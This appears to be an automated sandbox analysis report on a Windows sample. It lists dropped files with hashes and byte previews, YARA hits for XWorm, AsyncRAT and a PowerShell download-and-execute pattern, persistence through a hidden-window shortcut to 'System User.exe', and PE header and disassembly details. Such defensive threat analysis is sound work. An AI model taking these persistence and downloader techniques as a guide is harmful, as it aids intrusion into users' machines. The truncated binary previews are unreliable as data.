                                                                                                                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):5232408
                                                                                                                                                                                                    Entropy (8bit):5.940072183736028
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:98304:/V+Qs2NuR5YV0L8PQ1CPwDvt3uFlDC4SC9c:9rs2NuDYV0L841CPwDvt3uFlDC4SCa
                                                                                                                                                                                                    MD5:123AD0908C76CCBA4789C084F7A6B8D0
                                                                                                                                                                                                    SHA1:86DE58289C8200ED8C1FC51D5F00E38E32C1AAD5
                                                                                                                                                                                                    SHA-256:4E5D5D20D6D31E72AB341C81E97B89E514326C4C861B48638243BDF0918CFA43
                                                                                                                                                                                                    SHA-512:80FAE0533BA9A2F5FA7806E86F0DB8B6AAB32620DDE33B70A3596938B529F3822856DE75BDDB1B06721F8556EC139D784BC0BB9C8DA0D391DF2C20A80D33CB04
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........._~.._~.._~..V.S.M~.....]~.....[~.....W~.....S~.._~...~......T~..J....~..J...7}..J...^~..J.?.^~..J...^~..Rich_~..........................PE..d......f.........." ...(..7..<......v........................................0P.......O...`...........................................H.0.....O.@....@O.|.... L. .....O../...PO.$...`{D.8............................yD.@.............O..............................text.....7.......7................. ..`.rdata........7.......7.............@..@.data...Ao....K..<....K.............@....pdata....... L.......K.............@..@.idata...%....O..&....N.............@..@.00cfg..u....0O.......N.............@..@.rsrc...|....@O.......N.............@..@.reloc..~....PO.......N.............@..B................................................................................................................................................
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\YgJ5inWPQO.exe
                                                                                                                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):6093816
                                                                                                                                                                                                    Entropy (8bit):6.129208926967787
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:98304:IDcLwZ+b7nYp4zwSL3TvGnYSBvxHDMiEZ10i:IDgt7nYpvu3TvJik0i
                                                                                                                                                                                                    MD5:3AAD23292404A7038EB07CE5A6348256
                                                                                                                                                                                                    SHA1:35CAC5479699B28549EBE36C1D064BFB703F0857
                                                                                                                                                                                                    SHA-256:78B1DD211C0E66A0603DF48DA2C9B67A915AB3258701B9285D3FAA255ED8DC25
                                                                                                                                                                                                    SHA-512:F5B6EF04E744D2C98C1EF9402D7A8CE5CDA3B008837CF2C37A8B6D0CD1B188CA46585A40B2DB7ACF019F67E6CED59EFF5BC86E1AAF48D3C3B62FECF37F3AEC6B
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........F.r.'.!.'.!.'.!.. .'.!.z!.'.!.. .'.!.. .'.!.. .'.!._.!.'.!... .'.!.'.!N&.!F.. -'.!F.. .'.!F.x!.'.!F.. .'.!Rich.'.!........PE..d....WOg.........." ...*.L+..f9.....`W........................................d.......]...`...........................................P.......P...... d......P].......\..3...0d.D....Q3.T.....................I.(....P3.@............`+..............................text....K+......L+................. ..`.rdata....%..`+...%..P+.............@..@.data...$:....Q..N....P.............@....pdata.......P]......@U.............@..@PyRuntim.N...._..P....W.............@....rsrc........ d.......\.............@..@.reloc..D....0d.......\.............@..B........................................................................................................................................................................................................
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\YgJ5inWPQO.exe
                                                                                                                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):32248
                                                                                                                                                                                                    Entropy (8bit):6.547651395731859
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:768:QCy9Hf68Z5Im9G9JyUFRYT2Ip4HCxf1mlzzTz:QCy9/68Z5Im9G3yUzR9YfIPv
                                                                                                                                                                                                    MD5:62FE3761D24B53D98CC9B0CBBD0FEB7C
                                                                                                                                                                                                    SHA1:317344C9EDF2FCFA2B9BC248A18F6E6ACEDAFFFB
                                                                                                                                                                                                    SHA-256:81F124B01A85882E362A42E94A13C0EFF2F4CCD72D461821DC5457A789554413
                                                                                                                                                                                                    SHA-512:A1D3DA17937087AF4E5980D908ED645D4EA1B5F3EBFAB5C572417DF064707CAE1372B331C7096CC8E2E041DB9315172806D3BC4BB425C6BB4D2FA55E00524881
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Ks{.*.(.*.(.*.(.R.(.*.(..).*.(..).*.(..).*.(..).*.(w..).*.(.*.(.*.(...).*.(w..).*.(w..).*.(w..(.*.(w..).*.(Rich.*.(................PE..d....WOg.........." ...*.....2......................................................n.....`..........................................@..L...<A..x....p.......`.......J...3......L....3..T............................2..@............0...............................text............................... ..`.rdata.......0......................@..@.data...p....P.......8..............@....pdata.......`.......:..............@..@.rsrc........p.......>..............@..@.reloc..L............H..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\YgJ5inWPQO.exe
                                                                                                                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):711912
                                                                                                                                                                                                    Entropy (8bit):5.867548153768221
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12288:LY4dLI/X77mvfldCKGihH32W3cnPSqrUgLnm:LY4W7qNxr3cnPXLnm
                                                                                                                                                                                                    MD5:43B8B61DEBBC6DD93124A00DDD922D8C
                                                                                                                                                                                                    SHA1:5DEE63D250AC6233AAC7E462EEE65C5326224F01
                                                                                                                                                                                                    SHA-256:3F462EE6E7743A87E5791181936539642E3761C55DE3DE980A125F91FE21F123
                                                                                                                                                                                                    SHA-512:DD4791045CF887E6722FEAE4442C38E641F19EC994A8EAF7667E9DF9EA84378D6D718CAF3390F92443F6BBF39840C150121BB6FA896C4BADD3F78F1FFE4DE19D
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b..Q&...&...&.../fY. ...7...$...7...%...7.......7...+.......%...T...$...&...i.......'.......'.....5.'.......'...Rich&...................PE..d....WOg.........." ...*.B...f......P,....................................................`.........................................P...X................................6..........p...T...........................0...@............`..h............................text....@.......B.................. ..`.rdata...?...`...@...F..............@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode
The report lists this identical 60-byte file (same size, entropy, SSDEEP, MD5, SHA1, SHA-256 and SHA-512, Malicious:false) four more times, each dropped by C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe.
                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\YgJ5inWPQO.exe
                                                                                                                                                                                                    File Type:PE32+ executable (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):819200
                                                                                                                                                                                                    Entropy (8bit):5.598261375667174
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12288:qhd8cjaLXVh84wEFkW1mocaBj6WtiRPpptHxQ0z:2ycjar84w5W4ocaBj6y2tHDz
                                                                                                                                                                                                    MD5:02C70D9D6696950C198DB93B7F6A835E
                                                                                                                                                                                                    SHA1:30231A467A49CC37768EEA0F55F4BEA1CBFB48E2
                                                                                                                                                                                                    SHA-256:8F2E28588F2303BD8D7A9B0C3FF6A9CB16FA93F8DDC9C5E0666A8C12D6880EE3
                                                                                                                                                                                                    SHA-512:431D9B9918553BFF4F4A5BC2A5E7B7015F8AD0E2D390BB4D5264D08983372424156524EF5587B24B67D1226856FC630AACA08EDC8113097E0094501B4F08EFEB
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 63%
                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....5g.........."......v............... ....@...... ....................................`.................................................4...T.......u............................................................................................ ..H............text....t... ...v.................. ..`.rsrc...u............x..............@..@.reloc...............~..............@..BH...........|............................................................0..R.......(....:....*r...p(....r...po....:-...r-..pr&..p.. (.....@....r...pr<..p(....(....&*.......0..........rL..prT..p.(....s....%.o....%.o....%.o....%.o.....s.......o.....o....&.o....o......(....9.....o....o.............9.....o......*.......8.8p.......0..8.......r\..p.......%...%.r^..p.%...%.r...p.%...%.r...p.(......*.....(....~....%:....&~......*...s....%.....(...+*...0..l.........(....r...p(....(....r\..p.
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\YgJ5inWPQO.exe
                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):4
                                                                                                                                                                                                    Entropy (8bit):2.0
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:3:qn:qn
                                                                                                                                                                                                    MD5:3F1D1D8D87177D3D8D897D7E421F84D6
                                                                                                                                                                                                    SHA1:DD082D742A5CB751290F1DB2BD519C286AA86D95
                                                                                                                                                                                                    SHA-256:F02285FB90ED8C81531FE78CF4E2ABB68A62BE73EE7D317623E2C3E3AEFDFFF2
                                                                                                                                                                                                    SHA-512:2AE2B3936F31756332CA7A4B877D18F3FCC50E41E9472B5CD45A70BEA82E29A0FA956EE6A9EE0E02F23D9DB56B41D19CB51D88AAC06E9C923A820A21023752A9
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:blat
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\YgJ5inWPQO.exe
                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):83968
                                                                                                                                                                                                    Entropy (8bit):6.0557840174909385
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:1536:S2q2+SuMeXA5gBQsGQ17zcaIcbml5eUwqo/wc/D6X0i3KOOtJHcA+:SV23ua0VKcbml5vje/Zi3FOtJ/+
                                                                                                                                                                                                    MD5:A3B7B97F81C08C56A79971799B793072
                                                                                                                                                                                                    SHA1:400525C81A140BEB77C035C95480D40B64496F8E
                                                                                                                                                                                                    SHA-256:68A5C3157A890D65AE1836EF3794A757D9F1F06559CCF174E7B0E6293ADA8925
                                                                                                                                                                                                    SHA-512:967E096C8091968CE0B2D53DFF0632B0CDC34D8B11E34C7F5CE8CEDD853D860F059E51318ECFD564BA0545A4304AFCCC8B4567BE777A2D55BB4C761E91F1F8DA
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Yara Hits:
                                                                                                                                                                                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\msedge.exe, Author: Joe Security
                                                                                                                                                                                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\msedge.exe, Author: Joe Security
                                                                                                                                                                                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\msedge.exe, Author: ditekSHen
                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 82%
                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....]g.................>...........\... ...`....@.. ....................................@.................................d\..W....`............................................................................... ............... ..H............text....<... ...>.................. ..`.rsrc........`.......@..............@..@.reloc...............F..............@..B.................\......H........b..........&.....................................................(....*.r...p*. .x!.*..(....*.r...p*. ..A.*.s.........s.........s.........s.........*.r...p*. .+u.*.rV..p*. j...*.r...p*. }&..*.r...p*. S...*.ro..p*. *p{.*..((...*.r...p*. ...*.r...p*. +.).*.(+...-.(,...,.+.(-...,.+.(*...,.+.()...,..(Z...*"(....+.*&(....&+.*.+5sk... .... .'..ol...(,...~....-.(_...(Q...~....om...&.-.*.rp..p*. ~.H.*.r...p*. ....*.r...p*. ..?.*.rk..p*. ..e.*.r...p*.r...p*.rf..p*.r...p*. ..
                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\msedge.exe
                                                                                                                                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Dec 20 17:04:28 2024, mtime=Fri Dec 20 17:04:28 2024, atime=Fri Dec 20 17:04:28 2024, length=83968, window=hide
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):787
                                                                                                                                                                                                    Entropy (8bit):5.065956055628723
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:8PFsh64MukChJfyY//4Jx1SLAlidsldHTjABuHlyfHN2Nh2NfmV:8PCMDIJWsa/Arl2/25m
                                                                                                                                                                                                    MD5:61AC4C10C25A99BF2169DFA8059105D0
                                                                                                                                                                                                    SHA1:CEE4073D2FB36C42C2118406580E7DCB54A04EA0
                                                                                                                                                                                                    SHA-256:6E60B247338124F045B193447EA1C9A60A3DEAEB75577CA7CDDA3EF817DA2E1B
                                                                                                                                                                                                    SHA-512:F8E3B6EB7A09CD3156B4B1F994CCCAD16205C903F8B062A581F4FC879348762F09EED094E0B6B08457CC52E5261A6F6B6FE404972077926878E8BF62363B2765
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:L..................F.... ........S.......S.......S...H........................:..DG..Yr?.D..U..k0.&...&.......y.Yd...;.i.S..`....S......t...CFSF..1.....EW)B..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW)B.Ye...........................d...A.p.p.D.a.t.a...B.V.1......Yb...Roaming.@......EW)B.Yb.............................x.R.o.a.m.i.n.g.....l.2..H...Y.. .SYSTEM~1.EXE..P......Y...Y.............................N..S.y.s.t.e.m. .U.s.e.r...e.x.e.......^...............-.......]...........G.QI.....C:\Users\user\AppData\Roaming\System User.exe........\.....\.....\.....\.....\.S.y.s.t.e.m. .U.s.e.r...e.x.e.`.......X.......179605...........hT..CrF.f4... .yS......,...E...hT..CrF.f4... .yS......,...E..E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................
                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\msedge.exe
                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):83968
                                                                                                                                                                                                    Entropy (8bit):6.0557840174909385
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:1536:S2q2+SuMeXA5gBQsGQ17zcaIcbml5eUwqo/wc/D6X0i3KOOtJHcA+:SV23ua0VKcbml5vje/Zi3FOtJ/+
                                                                                                                                                                                                    MD5:A3B7B97F81C08C56A79971799B793072
                                                                                                                                                                                                    SHA1:400525C81A140BEB77C035C95480D40B64496F8E
                                                                                                                                                                                                    SHA-256:68A5C3157A890D65AE1836EF3794A757D9F1F06559CCF174E7B0E6293ADA8925
                                                                                                                                                                                                    SHA-512:967E096C8091968CE0B2D53DFF0632B0CDC34D8B11E34C7F5CE8CEDD853D860F059E51318ECFD564BA0545A4304AFCCC8B4567BE777A2D55BB4C761E91F1F8DA
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Yara Hits:
                                                                                                                                                                                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\System User.exe, Author: Joe Security
                                                                                                                                                                                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\System User.exe, Author: Joe Security
                                                                                                                                                                                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\System User.exe, Author: ditekSHen
                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 82%
                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....]g.................>...........\... ...`....@.. ....................................@.................................d\..W....`............................................................................... ............... ..H............text....<... ...>.................. ..`.rsrc........`.......@..............@..@.reloc...............F..............@..B.................\......H........b..........&.....................................................(....*.r...p*. .x!.*..(....*.r...p*. ..A.*.s.........s.........s.........s.........*.r...p*. .+u.*.rV..p*. j...*.r...p*. }&..*.r...p*. S...*.ro..p*. *p{.*..((...*.r...p*. ...*.r...p*. +.).*.(+...-.(,...,.+.(-...,.+.(*...,.+.()...,..(Z...*"(....+.*&(....&+.*.+5sk... .... .'..ol...(,...~....-.(_...(Q...~....om...&.-.*.rp..p*. ~.H.*.r...p*. ....*.r...p*. ..?.*.rk..p*. ..e.*.r...p*.r...p*.rf..p*.r...p*. ..
                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\dddd.exe
                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                    Category:dropped
Size (bytes):103
Entropy (8bit):4.081427527984575
Encrypted:false
SSDEEP:3:XSWHlkHFWKBgdvHvIhN9GIxFf9oQg652UTF/HLMl1m:XSWHlW0aivQLkWFfx/52uyPm
MD5:B016DAFCA051F817C6BA098C096CB450
SHA1:4CC74827C4B2ED534613C7764E6121CEB041B459
SHA-256:B03C8C2D2429E9DBC7920113DEDF6FC09095AB39421EE0CC8819AD412E5D67B9
SHA-512:D69663E1E81EC33654B87F2DFADDD5383681C8EBF029A559B201D65EB12FA2989FA66C25FA98D58066EAB7B897F0EEF6B7A68FA1A9558482A17DFED7B6076ACA
Malicious:false
Preview:{. "args" : {. "code" : "8PgspRYAQu". },. "cmd" : "INVITE_BROWSER",. "nonce" : ".". }
Process:C:\Windows\System32\WerFault.exe
File Type:MS Windows registry file, NT/2000 or above
Category:dropped
Size (bytes):1835008
Entropy (8bit):4.37224651035039
Encrypted:false
SSDEEP:6144:tFVfpi6ceLP/9skLmb0qyWWSPtaJG8nAge35OlMMhA2AX4WABlguNtiL:7V18yWWI/glMM6kF7Pq
MD5:0F0113D63B19434A9E16332268EDFFB1
SHA1:568521B5DB7B81D25D1EEB495ECBE47D2F89CEE0
SHA-256:6B627B482306A0F7F068F668AF9BD4F479E577DDDCCEC0B15831F99DA5AC70CD
SHA-512:4C203A0512F435E53E36551E9D61CD81979604B5EF704C91141CB71E499E1EBCA080070FB48B13B69AB14616740819C70EB37171B1B1E2B30D08BB8A6735D864
Malicious:false
Preview:regfC...C....\.Z.... ....0......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e.... [binary registry hive data (Amcache.hve); non-printable byte runs elided]
Process:C:\Users\user\AppData\Local\Temp\dddd.exe
File Type:ISO-8859 text, with CRLF, LF line terminators
Category:dropped
Size (bytes):571
Entropy (8bit):4.9398118662542965
Encrypted:false
SSDEEP:12:t+3p+t/hQAOfVaOQsXCzLQ8X+UwkY1v3igBe:Yot/h+ltcQy+UwkY1vdBe
MD5:5294778E41EE83E1F1E78B56466AD690
SHA1:348B8B4687216D57B8DF59BBCEC481DC9D1E61A6
SHA-256:3AC122288181813B83236E1A2BCB449C51B50A3CA4925677A38C08B2FC6DF69C
SHA-512:381FB6F3AA34E41C17DB3DD8E68B85508F51A94B3E77C479E40AD074767D1CEAE89B6E04FB7DD3D02A74D1AC3431B30920860A198C73387A865051538AE140F1
Malicious:true
Yara Hits:
• Rule: JoeSecurity_PowershellDownloadAndExecute, Description: Yara detected Powershell download and execute, Source: \Device\ConDrv, Author: Joe Security
Preview:[non-printable bytes elided]------------------------.. ..[-] Fetching endpoint.....[-] Bootstrapper up to date...[-] Killing conflicting processes.....[-] Ensuring essential directories.....[-] Ensuring essential dependencies.....[-] Downloading node......Unhandled Exception: System.Net.WebException: The operation has timed out.. at System.Net.WebClient.DownloadFile(Uri address, String fileName).. at Program.DownloadAndInstallNode().. at Program.EnsureDependencies().. at Program.Main(String[] args).
File type:PE32+ executable (GUI) x86-64, for MS Windows
Entropy (8bit):7.983672506604139
TrID:
• Win64 Executable GUI (202006/5) 92.65%
• Win64 Executable (generic) (12005/4) 5.51%
• Generic Win/DOS Executable (2004/3) 0.92%
• DOS Executable Generic (2002/1) 0.92%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:YgJ5inWPQO.exe
File size:7'714'025 bytes
MD5:abbb4a5a77f9cf1530d24710a621026c
SHA1:a8b3f3d965202dfd6b7a9cc10963c0cfccf35682
SHA256:fdd53599267201df460d004d399609274c7f0ba5342004d5c73e817f33a670a2
SHA512:d7018660bc562a089b28b4d28424dc4e82c862cd90917ecd7e2de89aa283c2e66a909d7e50b2bb492dd741aee54878c1f5b64eeebe7e4ac1ce45031e2ef0bcd1
SSDEEP:196608:5RKqV783kdaXMCHGLLc54i1wN+DrRRu7NtbFRKnZMZDYhmh1wlxN8:XKqV7/cXMCHWUj7rRQ7XbFsn6ZUEWN
TLSH:AE76231503E110FBDF62063CF4E0AA35C1FC6AE56B61CEC6ABB45566EE23ACC59E4D10
File Content Preview:MZ... This program cannot be run in DOS mode ... Rich ... PE..d.. [binary PE header; non-printable bytes elided]
Icon Hash:f0e1d4f0d0e972c7
Entrypoint:0x14000ce20
Entrypoint Section:.text
Digitally signed:false
Imagebase:0x140000000
Subsystem:windows gui
Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Time Stamp:0x6764E65D [Fri Dec 20 03:37:01 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:6
OS Version Minor:0
File Version Major:6
File Version Minor:0
Subsystem Version Major:6
Subsystem Version Minor:0
Import Hash:72c4e339b7af8ab1ed2eb3821c98713a
Instruction
dec eax
sub esp, 28h
call 00007FB28D049CBCh
dec eax
add esp, 28h
jmp 00007FB28D0498DFh
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
dec eax
sub esp, 28h
call 00007FB28D04A088h
test eax, eax
je 00007FB28D049A83h
dec eax
mov eax, dword ptr [00000030h]
dec eax
mov ecx, dword ptr [eax+08h]
jmp 00007FB28D049A67h
dec eax
cmp ecx, eax
je 00007FB28D049A76h
xor eax, eax
dec eax
cmpxchg dword ptr [0003570Ch], ecx
jne 00007FB28D049A50h
xor al, al
dec eax
add esp, 28h
ret
mov al, 01h
jmp 00007FB28D049A59h
int3
int3
int3
dec eax
sub esp, 28h
test ecx, ecx
jne 00007FB28D049A69h
mov byte ptr [000356F5h], 00000001h
call 00007FB28D0491B5h
call 00007FB28D04A4A0h
test al, al
jne 00007FB28D049A66h
xor al, al
jmp 00007FB28D049A76h
call 00007FB28D056FBFh
test al, al
jne 00007FB28D049A6Bh
xor ecx, ecx
call 00007FB28D04A4B0h
jmp 00007FB28D049A4Ch
mov al, 01h
dec eax
add esp, 28h
ret
int3
int3
inc eax
push ebx
dec eax
sub esp, 20h
cmp byte ptr [000356BCh], 00000000h
mov ebx, ecx
jne 00007FB28D049AC9h
cmp ecx, 01h
jnbe 00007FB28D049ACCh
call 00007FB28D049FFEh
                                                                                                                                                                                                    test eax, eax
                                                                                                                                                                                                    je 00007FB28D049A8Ah
                                                                                                                                                                                                    test ebx, ebx
                                                                                                                                                                                                    jne 00007FB28D049A86h
                                                                                                                                                                                                    dec eax
                                                                                                                                                                                                    lea ecx, dword ptr [000356A6h]
                                                                                                                                                                                                    call 00007FB28D056DB2h
Data directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x3ca34 | 0x78 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x47000 | 0x399a8 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x44000 | 0x2238 | .pdata
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x81000 | 0x764 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x3a080 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x39f40 | 0x140 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2b000 | 0x4a0 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Sections

Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x29f70 | 0x2a000 | b8c3814c5fb0b18492ad4ec2ffe0830a | False | 0.5518740699404762 | data | 6.489205819736506 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x2b000 | 0x12a28 | 0x12c00 | 71826b47a5757e783ac2554e4fac4d07 | False | 0.5242838541666667 | data | 5.750761883018192 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x3e000 | 0x53f8 | 0xe00 | dba0caeecab624a0ccc0d577241601d1 | False | 0.134765625 | data | 1.8392217063172436 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata | 0x44000 | 0x2238 | 0x2400 | 9cd1eac931545f28ab09329f8bfce843 | False | 0.4697265625 | data | 5.2645170849678795 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x47000 | 0x399a8 | 0x39a00 | 2a222210866bf01a9ffa2603a48d267c | False | 0.6296646217462039 | data | 6.62301529999922 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x81000 | 0x764 | 0x800 | 816c68eeb419ee2c08656c31c06a0fff | False | 0.5576171875 | data | 5.2809528666624175 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Resources

Name | RVA | Size | Type | Language | Country | ZLIB Complexity
